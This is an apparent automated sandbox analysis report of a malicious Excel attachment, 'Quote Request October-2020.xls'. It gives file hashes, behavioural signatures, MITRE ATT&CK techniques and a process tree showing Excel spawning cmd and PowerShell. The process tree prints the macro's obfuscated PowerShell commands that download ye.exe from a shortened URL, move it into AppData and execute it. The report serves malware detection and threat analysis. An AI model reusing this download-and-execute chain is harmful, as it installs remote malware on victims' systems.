166989f61fb157324d0c29d69d5aae0aa2a7813c9f4a0c1ab6506730dd66b434

General

Target

Quote Request October-2020.xls
Size

66KB
MD5

57d2e6d7a94b56acfc61035d2577a86a
SHA1

69248b27552383513f0b4d5839a63386849217dd
SHA256

166989f61fb157324d0c29d69d5aae0aa2a7813c9f4a0c1ab6506730dd66b434
SHA512

04b171a580f5d46d82ceb5d6a73009bc8e3a289e75e592e1b0d5b83052a1f37221e3c197bf170da07fbebf7088fa7dfb044103890f127d0af45d2aba01800e2e

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/yxmkb9y9

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2124	3940	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2244	3940	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2368	3940	cmd.exe	EXCEL.EXE

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

18 2616 powershell.exe
22 2616 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

ye.exe

pid process

2000 ye.exe

flow	pid	process
18	2616	powershell.exe
22	2616	powershell.exe

pid	process
2000	ye.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3940 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2616	powershell.exe
2572	powershell.exe
3804	powershell.exe
2572	powershell.exe
3804	powershell.exe
2616	powershell.exe
2572	powershell.exe
3804	powershell.exe
2616	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2572 powershell.exe
Token: SeDebugPrivilege 2616 powershell.exe
Token: SeDebugPrivilege 3804 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE
3940	EXCEL.EXE

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 3940 wrote to memory of 2124	3940	EXCEL.EXE	cmd.exe
PID 3940 wrote to memory of 2124	3940	EXCEL.EXE	cmd.exe
PID 3940 wrote to memory of 2244	3940	EXCEL.EXE	cmd.exe
PID 3940 wrote to memory of 2244	3940	EXCEL.EXE	cmd.exe
PID 3940 wrote to memory of 2368	3940	EXCEL.EXE	cmd.exe
PID 3940 wrote to memory of 2368	3940	EXCEL.EXE	cmd.exe
PID 2244 wrote to memory of 2572	2244	cmd.exe	powershell.exe
PID 2244 wrote to memory of 2572	2244	cmd.exe	powershell.exe
PID 2124 wrote to memory of 2616	2124	cmd.exe	powershell.exe
PID 2124 wrote to memory of 2616	2124	cmd.exe	powershell.exe
PID 2368 wrote to memory of 3804	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 3804	2368	cmd.exe	powershell.exe
PID 3804 wrote to memory of 2000	3804	powershell.exe	ye.exe
PID 3804 wrote to memory of 2000	3804	powershell.exe	ye.exe
PID 3804 wrote to memory of 2000	3804	powershell.exe	ye.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quote Request October-2020.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3940

C:\Windows\SYSTEM32\cmd.exe
cmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxmkb9y9'),'ye.exe')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxmkb9y9'),'ye.exe')
3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\SYSTEM32\cmd.exe
cmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\SYSTEM32\cmd.exe
cmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3804

C:\Users\Admin\AppData\Roaming\ye.exe
"C:\Users\Admin\AppData\Roaming\ye.exe"
4⤵
- Executes dropped EXE
PID:2000

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e53466bf92bb5d6747f922f11aca0a9c

SHA1
9437465500d602b8abcf82eaeb51afcb1a36d18b

SHA256
79ca04cadff6832a7dd2df04ab8f56676af8429b3dc324b2c2d1ef23d7d0081e

SHA512
fdbed140374c758b28ef8d5824161bd916f05ae9a6499ef161351c1e1a1408c6da1a6c9472c1cb1ed37f2c5b874e671dc9bf5ef53bb2bef3cbffc96472337c7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fd8b143fc908b264d00f2c6b3e05ea0b

SHA1
1fd03106df56535d75d0f507831a3c4593fe00cc

SHA256
432dda5ca8584a4864c51da2a290e859ebc9705062195acd2f70d278d34bb154

SHA512
d039b32b0466295010cc9a124dc9fd42b48909c34ccd8372e7bbf8f059e0391618eabe059030ba3e3535377c7e4d319d1ded449965a3d69b719166e1a88b815b

Download Submit
C:\Users\Admin\AppData\Roaming\ye.exe
MD5
9511fdd4fff8aa19872ac503e15a5b86

SHA1
8db2c03943393cfac44dd56e948852f2d132e2ce

SHA256
2265d18a36231a2141dc86a9dd49ef5538ab7f0509cad1459e5d11ccaeb15020

SHA512
c3526363a40c8a4c2009e16269c907196d376d63c5caa5b5b9825431958aa33bfa1d341cf162210da84233090ed0ec2f748eabdd4e4e14a1cdc76ccd8fa85426

Download Submit
C:\Users\Admin\Documents\ye.exe
MD5
9511fdd4fff8aa19872ac503e15a5b86

SHA1
8db2c03943393cfac44dd56e948852f2d132e2ce

SHA256
2265d18a36231a2141dc86a9dd49ef5538ab7f0509cad1459e5d11ccaeb15020

SHA512
c3526363a40c8a4c2009e16269c907196d376d63c5caa5b5b9825431958aa33bfa1d341cf162210da84233090ed0ec2f748eabdd4e4e14a1cdc76ccd8fa85426

Download Submit
memory/2000-19-0x0000000000000000-mapping.dmp

Download
memory/2124-1-0x0000000000000000-mapping.dmp

Download
memory/2244-2-0x0000000000000000-mapping.dmp

Download
memory/2368-3-0x0000000000000000-mapping.dmp

Download
memory/2572-4-0x0000000000000000-mapping.dmp

Download
memory/2572-13-0x0000026757740000-0x0000026757741000-memory.dmp

Filesize
4KB

Download
memory/2572-9-0x0000026757590000-0x0000026757591000-memory.dmp

Filesize
4KB

Download
memory/2572-7-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmp

Filesize
9.9MB

Download
memory/2616-6-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmp

Filesize
9.9MB

Download
memory/2616-5-0x0000000000000000-mapping.dmp

Download
memory/3804-10-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmp

Filesize
9.9MB

Download
memory/3804-8-0x0000000000000000-mapping.dmp

Download
memory/3940-0-0x00007FFAD49C0000-0x00007FFAD4FF7000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads